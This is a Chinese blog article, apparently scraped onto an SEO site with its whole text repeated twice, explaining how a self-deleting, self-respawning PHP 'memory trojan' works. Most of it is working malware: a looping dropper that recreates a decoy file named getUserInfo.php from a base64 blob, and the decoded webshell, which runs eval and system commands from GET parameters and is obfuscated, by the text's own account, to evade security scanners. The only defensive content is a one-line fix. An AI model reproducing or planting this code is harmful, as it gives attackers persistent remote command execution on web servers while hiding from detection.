PHP内存木马病毒是如何实现并利用内存进行攻击的原理?

2026-04-06 15:111阅读0评论SEO资讯
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计646个文字,预计阅读时间需要3分钟。

PHP内存木马病毒是如何实现并利用内存进行攻击的原理?

前言:内存木马,即在内存中运行的木马病毒,没有代码实体。

内存木马具有以下特点:- 具有极强的隐蔽性,排查困难。- 杀死进程后,木马仍可能存活(俗称不死马)。

网络安全行业,具有强大的木桶效应。

前言

PHP内存木马病毒是如何实现并利用内存进行攻击的原理?

内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。

网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。

正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。

病毒源代码 (很简单)

<?php //设置脚本不超时 set_time_limit(0);ignore_user_abort(true); //删除文件本体 @unlink(__FILE__); //给木马病毒起一个迷惑性的名字 $file = './getUserInfo.php'; //死循环常驻内存。释放木马文件 while(true) { if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=')); sleep(60); }登录后复制

释放病毒本体

<?php //以下代码实现了eval关键字和system函数的伪装 //eval($_GET['e']); if($e = @$_GET['e']) { $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7')); $func(); } //system($_GET['s']); if($s = @$_GET['s']) { $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx'); $f($s); }登录后复制

说明

  • 以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。

  • 一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。

  • 就算被释放的木马被识破后删除,还会产生同样的文件。

解决方案

干掉进程后,删除释放的木马文件。

推荐:《PHP视频教程》

php入门到就业线上直播课:立即学习
全程直播 + 实战授课 + 边学 + 边练 + 边辅导

以上就是带你分析PHP内存木马病毒实现原理的详细内容,更多请关注自由互联其它相关文章!

本文共计646个文字,预计阅读时间需要3分钟。

PHP内存木马病毒是如何实现并利用内存进行攻击的原理?

前言:内存木马,即在内存中运行的木马病毒,没有代码实体。

内存木马具有以下特点:- 具有极强的隐蔽性,排查困难。- 杀死进程后,木马仍可能存活(俗称不死马)。

网络安全行业,具有强大的木桶效应。

前言

PHP内存木马病毒是如何实现并利用内存进行攻击的原理?

内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。

网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。

正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。

病毒源代码 (很简单)

<?php //设置脚本不超时 set_time_limit(0);ignore_user_abort(true); //删除文件本体 @unlink(__FILE__); //给木马病毒起一个迷惑性的名字 $file = './getUserInfo.php'; //死循环常驻内存。释放木马文件 while(true) { if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=')); sleep(60); }登录后复制

释放病毒本体

<?php //以下代码实现了eval关键字和system函数的伪装 //eval($_GET['e']); if($e = @$_GET['e']) { $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7')); $func(); } //system($_GET['s']); if($s = @$_GET['s']) { $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx'); $f($s); }登录后复制

说明

  • 以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。

  • 一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。

  • 就算被释放的木马被识破后删除,还会产生同样的文件。

解决方案

干掉进程后,删除释放的木马文件。

推荐:《PHP视频教程》

php入门到就业线上直播课:立即学习
全程直播 + 实战授课 + 边学 + 边练 + 边辅导

以上就是带你分析PHP内存木马病毒实现原理的详细内容,更多请关注自由互联其它相关文章!